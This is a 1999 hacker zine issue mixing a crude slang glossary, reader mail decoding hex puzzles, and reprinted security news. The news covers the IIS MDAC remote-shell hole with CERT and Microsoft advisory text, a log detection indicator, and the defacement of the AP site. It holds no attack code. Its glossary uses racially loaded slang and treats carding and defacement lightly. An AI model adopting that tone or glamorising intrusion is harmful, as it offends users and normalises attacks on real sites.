00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq, it won't be reprinted unless changed in a big way, with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal". ASC(247) "wavy equals" sign means "almost equal to". If written as =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL      - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??
*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC      - End of Commentary

EoA      - End of Article or more commonly @HWA

EoF      - End of file

EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER  - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?'
           2 - A tool for cutting sheet metal.
HHN      - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN      - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin'way

*0WN3D   - You are cracked and owned by an elite entity see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
           Alternates: H - hacking, hacktivist
                       C - Cracking
                       C - Cracking
                       V - Virus
                       W - Warfare
                       A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                       P - Phreaking, "telephone hacking" PHone fREAKs ...
                       CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA      - To Be Arranged/To Be Announced also 2ba

TFS      - Tough fucking shit.

*w00t    - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf     - what the fuck, where the fuck, when the fuck etc ..

*ZEN     - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but I'd like to see more reader input, help me out here, what's good, what sucks etc, not that I guarantee I'll take any notice mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi

Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #Hackwhores and #403-sec

Celeb greets to Bad Kitty! meeyeaaooow! (you can hack my root anytime) Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick

kewl sites:

+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..." - FProphet '99

+++ When was the last time you backed up your important data?

++ contributed by AW, From HNN http://www.hackernews.com/

HNN has received an unconfirmed rumor that the host of Parse Hack/Phreak, Shamrock was fired for unknown reasons. Shamrock along with UglyPig will evidently no longer be hosting any Pseudo.com shows. This action comes not two weeks after the MTV special in which Shamrock manufactured a hoax for the 'documentary'. There was no episode of Parse last week and HNN has yet to receive official word from Pseudo.com.
It will be interesting to see if this week's scheduled episode will air. (That show needed a change of format anyway.)

http://Parsetv.com
http://www.biztechtv.com/parse

++ Contributed by duro

To celebrate the upcoming mass-destruction and world-wide chaos in 2000, w00w00 Security Development (WSD) will be releasing many advisories depending on vendor's timely responses. The severity of each vulnerability will outweigh the previously posted one, so keep your eyes out! If all goes according to plan, w00giving '99 will close with its largest vulnerability on Jan. 1, 2000, aka w00mageddon.

++ Contributed by Astral

Nov 7th, 1999 #403-sec opens up on EFnet, the channel for http://www.403-security.org related stuff and news... drop by and say hi.

++ Echelon 'Confirmation:' Not (Politics 11:45 a.m.)
http://www.wired.com/news/politics/0,1283,32302,00.html?tw=wn19991103
An Australian official's remarks to the BBC may bolster calls for investigation into international surveillance activities. But they don't confirm the alleged Project Echelon, experts say. By Chris Oakes.

++ Bull Carries Apple to Record (Reuters 12:20 p.m.)
http://www.wired.com/news/reuters/0,1349,32306,00.html?tw=wn19991103
They're singing "Kumbaya" down in Cupertino on Wednesday because shares of the computer maker surge to an all-time high.

++ Rats Dive into Cell Phone Debate (Technology 3:00 a.m.)
http://www.wired.com/news/technology/0,1282,32280,00.html?tw=wn19991103
An experiment with rats swimming in milk indicates cell phones may damage long-term memory and the ability to navigate. What does this strange study mean for humans? By Kristen Philipkoski.

++ Why the DVD Hack Was a Cinch (Technology 2.Nov.99)
http://www.wired.com/news/technology/0,1282,32263,00.html?tw=wn19991103
DVD movies were supposed to be pirate-proof -- that was its reason for being. So how could two hackers break the code in a matter of hours? Human error on the encryption end. By Andy Patrizio.

++ The DVD Hack: What Next?
(Technology 3:00 a.m.)
http://www.wired.com/news/technology/0,1282,32265,00.html?tw=wn19991104
The supposed hacker-proof DVD security system was easily broken by Linux users who couldn't watch movies on their systems. Andy Patrizio, who broke the story, offers suggestions about what the movie industry should do next.

++ Haiti Shuts Down Its Biggest ISP (Politics 3:00 a.m.)
http://www.wired.com/news/politics/0,1283,32316,00.html?tw=wn19991104
Thousands of Haitians lose Internet access when the government pulls the plug on the country's largest ISPs. Civil libertarians say the move suppresses free speech and rally protesters.

++ China's Cable TV Fights for Net (Reuters 3:00 a.m.)
http://www.wired.com/news/reuters/0,1349,32315,00.html?tw=wn19991104
China's government maneuvers to stem an increasingly bitter battle between cable operators and telephone companies over their future on the Net.

Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, let's give the message board a bit more use eh? I'll be using a real message board when the hwa-iwa.org domain comes back online (soon), meanwhile the beseen board is still up...

==============================================================================

From: red_army
To:
Sent: Tuesday, November 02, 1999 9:00 PM

hey, how's it going. i think i decoded your codes. any prizes for doing that? ;) a mention would be fine... keep up the good work (and make the codes a little harder!)
(code from hwa.haxor.news issue 40)

1st code:

[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

to hex:
99 41 32 49 57 57 57 32 99 114 117 99 112 104 117 120 32 104 119 97

to ascii:
c) 1999 crucphux hwa

which seems kinda incomplete, but that's how it decodes....

2nd k0de:

61:20:6B:69:64:20:63:6F:75:
6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!

decimal:
97:32:107:105:100:32:99:111:117:
108:100:32:98:114:101:97:107:32:116:104:105:115:
32:34:105:110:99:114:121:112:116:105:111:110:34:!

ascii:
a kid could break this "incryption" !

no sweat.

3rd code:

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]- [28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]

decimal:
(first line appears to be decimal already)
69:110:100 - 40:97:49:57:57:56:32:104:119:97:32:115:116:101:118:101

plain ascii:
first line has a lot of unprintables that i dunno right now... perhaps it is in sneaky hex?[1] and what is the minus sign for? intriguing...
Enn-(a1998 hwa steve

first line in hex:
40 97 41 32 49 57 57 57 32 97 114 117 97 105 112 104 117 120 32 104 119 97

first line in ascii:
(a) 1999 aruaiphux hwa

total ascii:
(a) 1999 aruaiphux hwa
Enn - (a1998 hwa steve

well, it seems clear that sometimes a = c, but sometimes not

changing selected a's yields:
(c) 1999 cruciphux hwa
Enn - (a1998 hwa steve

i feel the top line is correct: all these exist as plaintext strings within the newsletter (hell, cruciphux writes the damn thing, doesn't he/she/non-gender-specific-pronoun?) but the bottom....

try subtracting second from first..

69:110:100
- 40:97 :49 :57:57:56:32:104:119:97:32:115:116:101:118:101
------------------
29:3 :51, the first two are unprintable (meaning i don't know them)

try adding the two modulus 128 (ascii, right? sure...)
69:110:100
+ 40:97 :49
------------------- (mod 128)
109:79:21 => mO

try subtracting first from end of second: but that won't work, that will give us unprintables

ok, so we got three characters. changing three characters at the beginning is not immediately obvious what that would give us. changing three characters at the end is somewhat more likely because a) st!!! could be a valid word, and b) steve doesn't make much sense, unless steve is cruciphux, which i don't know.

ok, let's think this through...

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]

is it coincidence that the three 'mystery' letters line up with three other letters? what can we do with those? remember, those seem to be part of a valid string, but the other three could be changed to give something else. (whatever that thought meant...)

63:29:20
45:6E:64

in decimal

108:102:84 (if E = 3, 3 = E in h@X0r5p3@k, right?) => lfU, which is at least a printable string, but not immediately obvious (unless cruciphux attends lower florida university or something like that, fuck school pride)

converted from hex to decimal:

97:41 :32
69:110:100

added:
166:151:132

now, the highest letter ascii code is 122 (126 really, forget the tilde for now) and the lowest is 65 (33 for punctuation), so we have a spread of 122-65 = 57 characters. given that our added string has a spread of 166-132 = 34 characters, we have 23 different permutations of possible characters (again, just using letters...)

hmmmm.....
ok, this is a little wild, but here goes:

taking 100 away from each of those leaves 'B3 '

using that, the bottom line reads as:
B3 -(a1998 hwa steve

let's look at what we have to work with:

from the 1st part:
c) 1999 crucphux hwa

from the second part:
(a) 1999 aruaiphux hwa
Enn-(a1998 hwa steve

or, verbatim:

[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]

they do form lines, but i don't really feel like doing any matrix theory now (especially in ascii).

c) 1999 crucphux hwa
(a) 1999 aruaiphux hwa
Enn-(a1998 hwa steve

more speculation: if the e were lower case, it would have the same spread as 1 and 9; we would have to subtract (166-49=) 117 from at least that first term. doing that to all three yields 1" - that's not going to work.

ok, i am thinking too hard. maybe

ok, i got it. yes, i was thinking too hard, made a simple mistake at the stop. the last string should read (ok, i made a couple of mistakes):

End-(c)1998 hwa steve

which makes a lot more sense. and so the moral of the story is: check your fuckin work so you don't waste time later on! nice puzzle though, keep it up!

(ps - i dunno if you were being facetious, but it's 'encryption', not 'incryption'. you know that already, i bet)

[1] sneaky hex in that it not obviously hex, i.e. no letters... forget it

keep up the good work

02.0 From the editor.
~~~~~~~~~~~~~~~~~~~~~

    #include <stdio.h>

    int main(void)
    {
        printf ("Read commented source!\n\n");

        /*
         * I included some graphics in last week's issue and forgot to give
         * credit where it was due, the png was done by ScrewUp from the U.K
         * and the digital blasphemy rip was done by yours truly, with art
         * blatantly borrowed from http://www.digital-blasphemy.com/
         *
         * Enjoy the issue, sorry again for it being late, have been ill, #42
         * will be out ASAP covering Nov 7th - 14th. Included in the .zip of
         * this issue is a .bmp by Zym0t1c check it out, nice artwork...
         *
         * Cruciphux@dok.org
         */

        printf ("EoF.\n");
        return 0;
    }

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net

Complaints and all nastygrams and mai*lbombs can go to /dev/nul, nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 Fix Available For Very Powerful IIS Exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ender Wiggin

The recent spate of defacements of government and military sites may be the result of a hole released to BugTraq six months ago. This hole can be exploited with a simple perl script. A fix for this problem has come from a very unlikely source, the United Loan Gunmen.

OSALL
http://www.aviary-mag.com/News/Powerful_Exploit/ULG_Fix/ulg_fix.html

Late Update: 0931 CERT has also released an advisory on the issue and Microsoft does have an old fix. Considering the number of high profile sites that have been defaced because of this we suggest you patch your system now.

CERT
http://www.cert.org/current/current_activity.html#0

Microsoft Security Bulletin
http://www.microsoft.com/security/bulletins/ms99-025.asp

OSALL;

Temporary Fix for Remote IIS NT AUTHORITY / SYSTEM Shell Spawning Exploits
11/1/99
United Loan Gunmen

Recently, a perl script from Rain Forest Puppy was released and has become a favorite amongst script kiddies. The severity of this script allows remote NT AUTHORITY/SYSTEM level access, and is a major threat, even to highly secured NT networks.

We have come up with 2 ways of thwarting these types of attacks. Since RFP's perl script relies on the use of either cmd.exe or command.com, we feel that a temporary fix is to rename the cmd.exe shell or command.com shell to something else. Doing this will most likely fool 99% of the script kiddies.
A better temporary idea would be to set permissions of cmd.exe and command.com for NT AUTHORITY/SYSTEM to that of 'No Access' versus 'Full Control'. The most noted problem with this is that of using the Schedule service, which, by default, runs as NT AUTHORITY/SYSTEM. In this case, in order to still use the service, simply open up Services in the Control Panel. Select Schedule, then click the 'Startup...' button. By default, services are run as the System Account. Select the 'This Account:' radio button, and select a different user to run the service as. If you don't already have a user, create a new account.

NOTE: With NT, we found it is a wise idea to set user access for shells (with NT, cmd and command) to be different for services. This means that if netinfo.exe is run as NT AUTHORITY/SYSTEM, don't let NT AUTHORITY/SYSTEM have shell access. Should the ability to spawn a shell be possible, having permissions set as the above will stop it from happening, even if the hole is still there.

We have only provided a temporary fix, as we have not had much time to spend dealing with RFP's perl script. Look to Microsoft or a third party to provide a real fix.

-United Loan Gunmen.

CERT;

Attacks against IIS web servers involving MDAC

We are receiving reports of IIS web servers being compromised via vulnerabilities in IIS web servers with MS Data Access Components (MDAC) installed. This vulnerability has been widely discussed as early as April 22, 1998. Here are some pointers to information about this vulnerability:

http://support.microsoft.com/support/kb/articles/q184/3/75.asp
http://www.microsoft.com/security/bulletins/ms98-004.asp
http://www.microsoft.com/security/bulletins/ms99-025.asp

In incidents reported to us so far, attacks can be identified by looking through the IIS logfiles for POST access to the file "/msadc/msadcs.dll".
For example:

1999-10-24 20:38:12 - WWW POST /msadc/msadcs.dll 200 1409 664 782 ACTIVEDATA - -

If you use Microsoft Remote Data Services (RDS) these POST operations may be legitimate. We encourage all sites using IIS to carefully follow the steps listed in Microsoft Advisory MS99-025, referenced above, to secure or disable RDS.

Root Compromised UNIX Systems

rpc.cmsd, tooltalk, statd/automountd

We continue to receive frequent reports of intruders exploiting three different RPC service vulnerabilities to compromise UNIX systems. In many cases, the attacks are widespread and appear to be at least partially automated. For more information about this activity and the vulnerabilities being exploited, please refer to the following CERT/CC documents:

IN-99-04, Similar attacks using various RPC services
CA-99-08, Buffer overflow in rpc.cmsd
CA-99-05, Vulnerability in statd exposes vulnerability in automountd
CA-98.11, Vulnerability in ToolTalk RPC service

am-utils (amd)

We also continue to receive reports of intruder activity involving the am-utils package. For more information about this activity and the vulnerabilities being exploited, please refer to the following CERT/CC documents:

IN-99-05, Systems Compromised Through a Vulnerability in am-utils
CA-99-12, Buffer overflow in amd

Distributed Intruder Tools

Distributed Denial of Service Tools

We are receiving an increasing number of reports about intruders compromising machines in order to install distributed systems used for launching packet flooding denial of service attacks. The systems contain a small number of servers and a large number of clients. These reports indicate that machines participating in such distributed systems are likely to have been root compromised.

Widespread Scans and Probes

We continue to receive daily reports of widespread scans and probes. Probe targets continue to include well-known services and a variety of registered and unregistered service ports.
In some cases, scanning is automated and includes automated exploitation of vulnerabilities. The most frequent reports involve probes for services that have well-known vulnerabilities. Hosts continue to be compromised as a result of the vulnerabilities associated with these services. On some operating systems, these services are installed and enabled by default.

Service Name   Port/Protocol   Related Information
------------   -------------   -------------------
domain         53/tcp          CA-98.05, Multiple Vulnerabilities in BIND
ftp            21/tcp          CA-99-13, Multiple Vulnerabilities in WU-FTPD
icmp echo      8/icmp          CA-98.01, Smurf IP Denial-of-Service Attacks
sunrpc         111/tcp         CA-99-12, Buffer overflow in amd
                               CA-99-08, Buffer overflow in rpc.cmsd
                               CA-99-05, Vulnerability in statd exposes vulnerability in automountd
                               CA-98.11, Vulnerability in ToolTalk RPC service
                               CA-98.12, Remotely Exploitable Buffer Overflow Vulnerability in mountd
imap           143/tcp         CA-98.09, Buffer Overflow in Some Implementations of IMAP Servers

For an overview of incident and vulnerability activity during the last quarter, see the most recent CERT Summary.

Copyright 1999 Carnegie Mellon University. See the conditions for use, disclaimers, and copyright information. CERT® and CERT Coordination Center® are registered in the U.S. Patent and Trademark office.

Microsoft;

Originally Released as MS98-004: July 17, 1998
Re-Released as MS99-025: July 19, 1999
Revised: July 23, 1999

Microsoft has identified a vulnerability in Microsoft Data Access Components (MDAC) that could allow a web site visitor to take unauthorized actions on a web site hosted using Internet Information Server. The vulnerability can be eliminated by reconfiguring or removing the affected components of MDAC.

This vulnerability originally was reported in Microsoft Security Bulletin MS98-004 (ms98-004.asp) issued July 17, 1998. It was re-released on July 19, 1999, to remind customers of the need to address the vulnerability.
It was updated on July 23, 1999, to discuss the need to remove sample files that are affected by the vulnerability, and to clarify that MDAC 2.0 is affected even if deployed as a clean installation.

Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-025faq.asp. The FAQ contains instructions for eliminating the vulnerability.

The RDS DataFactory object, a component of Microsoft Data Access Components (MDAC), exposes unsafe methods. When installed on a system running Internet Information Server 3.0 or 4.0, the DataFactory object may permit an otherwise unauthorized web user to perform privileged actions, including:

- Allowing unauthorized users to execute shell commands on the IIS system as a privileged user.
- On a multi-homed Internet-connected IIS system, using MDAC to tunnel SQL and other ODBC data requests through the public connection to a private back-end network.
- Allowing unauthorized access to secured, non-published files on the IIS system.

Affected Software Versions

The vulnerability affects the Microsoft Data Access Components, when installed on a web server running Internet Information Server 3.0 or 4.0. Specifically:

- MDAC 1.5 and 2.0 are affected
- MDAC 2.1 is affected if installed as an upgrade from a previous version of MDAC, rather than a clean installation
- Any version of MDAC is affected if Sample Pages for RDS are installed.

NOTE: Sample Pages for RDS are provided as part of the Windows 4.0 Option Pack and the MDAC 2.0 Software Development Kit. They are not installed by default in the Option Pack, but are installed by default in the MDAC 2.0 SDK.

NOTE: MDAC 1.5 and IIS are installed by default installations of the Windows NT 4.0 Option Pack.

NOTE: IIS can be installed as part of other Microsoft products, such as Microsoft BackOffice and Microsoft Site Server. MDAC can be installed as part of other Microsoft products, such as Visual C and Microsoft Office.
Patch Availability

This vulnerability requires a configuration change to eliminate it, rather than a patch. Details of the specific changes needed are available at http://www.microsoft.com/security/bulletins/MS99-025faq.asp

More Information

Please see the following references for more information related to this issue.

- Microsoft Security Bulletin MS99-025: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-025faq.asp
- Microsoft Knowledge Base (KB) article Q184375, Security Implications of RDS 1.5, IIS, and ODBC, http://support.microsoft.com/support/kb/articles/q184/3/75.asp
- Microsoft Universal Data Access Download Page, http://www.microsoft.com/data/download.htm
- Installing MDAC Q&A, http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm
- Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp
- IIS Security Checklist, http://www.microsoft.com/security/products/iis/CheckList.asp

Obtaining Support on this Issue

Microsoft Data Access Components (MDAC) is a fully supported set of technologies. If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp.

Acknowledgments

Microsoft acknowledges Greg Gonzalez of ITE (http://www.infotechent.net) for bringing additional information regarding this vulnerability to our attention, and .Rain.Forest.Puppy for identifying the involvement of Sample Pages for RDS. Microsoft also acknowledges Russ Cooper (NTBugTraq, http://www.ntbugtraq.com) for his assistance around this issue.

Revisions

July 19, 1999: Bulletin Created as re-release of MS98-004.
July 23, 1999: Bulletin updated to discuss involvement of Sample Pages for RDS, and to clarify status of MDAC 2.0.
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

@HWA

04.0 ULG Defaces Associated Press Web Site
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by punkis

     While the United Loan Gunmen may be supplying fixes for some security problems (see above story) they are still busy defacing more sites. This time it was the Associated Press who was left with a page wishing folks a Happy Halloween and a poem by Edgar Allan Poe.

     HNN Cracked Pages Archive
     http://www.hackernews.com/archive/crackarch.html

     Nando Times
     http://www.nandotimes.com/technology/story/body/0,1634,500051909-500085255-500280864-0,00.html

     Wired
     http://www.wired.com/news/culture/0,1284,32237,00.html

Nando;

Hackers break into Associated Press Web site

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

NEW YORK (November 1, 1999 9:27 p.m. EST http://www.nandotimes.com) - Hackers gained access to the Associated Press' corporate Web site and displayed a Halloween greeting with a poem by Edgar Allan Poe.

The page placed on the AP site Sunday carried the name of the "United Loan Gunmen." That name has appeared on break-ins at six other sites since August, including those of the Drudge Report, C-Span and ABC. The group also claimed responsibility for hacking a site for Nasdaq and the American Stock Exchange.
AP news operations were unaffected.

Wired;

AP Scared Siteless

Wired News Report
1:00 p.m. 31.Oct.1999 PST

The "United Loan Gunmen" apparently struck again Sunday, this time by cracking the venerable Associated Press.

Content on the wire service's corporate Web site was replaced with a Halloween greeting along with a poem by Edgar Allan Poe, according to the AP.

The AP said its news wires were unaffected by the intrusion.

The crackers have previously claimed credit for attacks on the Nasdaq and the American Stock Exchange, as well as the Drudge Report, C-Span, and ABC.

Site defacement;

Double, double, toil and trouble;
Fire burn and caldron bubble.

~Edgar Allen Poe~

In the greenest of our valleys
By good angels tenanted,
Once a fair and stately palace-
Radiant palace- reared its head.
In the monarch Thought's dominion-
It stood there!
Never seraph spread a pinion
Over fabric half so fair!

Banners yellow, glorious, golden,
On its roof did float and flow,
(This- all this- was in the olden
Time long ago,)
And every gentle air that dallied,
In that sweet day,
Along the ramparts plumed and pallid,
A winged odor went away.

Wanderers in that happy valley,
Through two luminous windows, saw
Spirits moving musically,
To a lute's well-tuned law,
Round about a throne where, sitting
(Porphyrogene!)
In state his glory well-befitting,
The ruler of the realm was seen.

And all with pearl and ruby glowing
Was the fair palace door,
Through which came flowing, flowing, flowing,
And sparkling evermore,
A troop of Echoes, whose sweet duty
Was but to sing,
In voices of surpassing beauty,
The wit and wisdom of their king.

But evil things, in robes of sorrow,
Assailed the monarch's high estate.
(Ah, let us mourn!- for never morrow
Shall dawn upon him desolate!)
And round about his home the glory
That blushed and bloomed,
Is but a dim-remembered story
Of the old time entombed.
And travellers, now, within that valley,
Through the red-litten windows see
Vast forms, that move fantastically
To a discordant melody,
While, like a ghastly rapid river,
Through the pale door
A hideous throng rush out forever
And laugh- but smile no more.

@HWA

05.0 Jane's To Host Cyber Terrorism Conference
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by William Knowles

     Jane's Intelligence Review will be hosting a conference on Cyber Terrorism in Washington DC on November 16 and 17, 1999. The title of the conference is Cyberterrorism: The Risks and Realities.

     Cyberterrorism: The Risks and Realities
     http://www.janes.com/defence/conference/cyberterrorism/cyber_home.html

Janes conferences

Terrorist organizations, both domestic and international, are looking toward technology to further their goals of disrupting your life or even harming you and the people you are trying to protect. Terrorists for the first time have the ability to affect your life remotely. By using computers and the internet, they can strike from the other side of the world, with relative anonymity and free from danger. CyberTerrorism requires simple, inexpensive hardware, free software and information available over the Internet.

Awareness to a new state of terrorism is crucial whether you are trying to protect your own computer, your company's systems or the infrastructure of your city or country. It is less the types of hacking incidents and mass distribution of viruses that receive media attention that is important. The real threat is an insidious form of hard-core hacking where the physical and virtual worlds collide.

Whether you are in the military, government or private sector, your vulnerability to terrorist attack is only increasing as the world becomes more dependent on computer systems, especially in critical infrastructure and life affecting industries that are being linked with each other across the globe.
Now you are not just in alliance with other people and nations, but also their communication equipment, computers and other technologies. Systems that control your finances, power, water, and communications as well as those in food and pharmaceutical plants, are vulnerable.

Jane's CyberTerrorism: The Risks and Realities goes beyond the threats and issues and focuses on practical solutions to real threats to your security:

- You will be guided through ways to develop and implement a counter-CyberTerrorism program.
- You will leave the conference with a clear sense of direction and a list of feasible steps to assess your risk and build a program of prevention, detection and response.
- You will get plenty of time for questions as well as interaction with speakers and colleagues.
- You can put the information you have learned to work during a mock CyberTerrorism attack wargame.

@HWA

06.0 Trust Site Solution Released
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by no0ne

     As the Federal Trade Commission continues with its efforts to decrease webjacking, Inspective Systems is set to come out with Trust Site Solution, which is being claimed as the first content-certification program. The software aims to protect the users and consumers against people who use simple HTML tricks to redirect traffic from legitimate web sites to fake ones. This can lead unsuspecting consumers into giving up their credit card numbers and other personal information.

     InfoWorld
     http://www.infoworld.com/cgi-bin/displayStory.pl?991029.hnwebjack.htm

IT gets tools to thwart Webjackers

By Ed Scannell
InfoWorld Electric

Posted at 4:43 PM PT, Oct 29, 1999

As millions of IT organizations hurry to get their businesses on-line to cash in on the electronic-commerce gold rush, it is getting more complicated to build trust among users by guaranteeing that Web site information is accurate and securely protected.
The latest challenge to that guarantee is "Webjacking," the nasty business of hackers hijacking legitimate Web pages and redirecting users to anywhere from pornography sites to sites set up for fraudulent business schemes.

Some industry observers believe that, if the practice continues to escalate unchecked, it could eventually erode users' buying confidence and negatively affect corporations' e-commerce revenues.

But while the bad guys appear to have a technical head start, good guys responsible for coming up with preventative security cures are starting to appear.

Inspective Systems, formerly known as Factpoint, a small software company in Burlington, Mass., will release by the end of the year its Trustsite Solution, which officials claim is the first content-certification program for Web sites.

The solution basically sets up a separate certification server for each Web site and creates a digital fingerprint for each certified page and each piece of content. Another component of the package sets up a validation server that constantly monitors a site's certified content as each page is loaded.

Some observers believe that Inspective's product could play a significant role in softening the anxieties of both corporate users and consumers.

"What is interesting about what Factpoint [does, is that it provides] a way to ensure authentication. You can install software on your machine that verifies that what you have is what you think you have,'' said Carol Baroudi, senior strategist for electronic business at the Hurwitz Group, in Framingham, Mass.

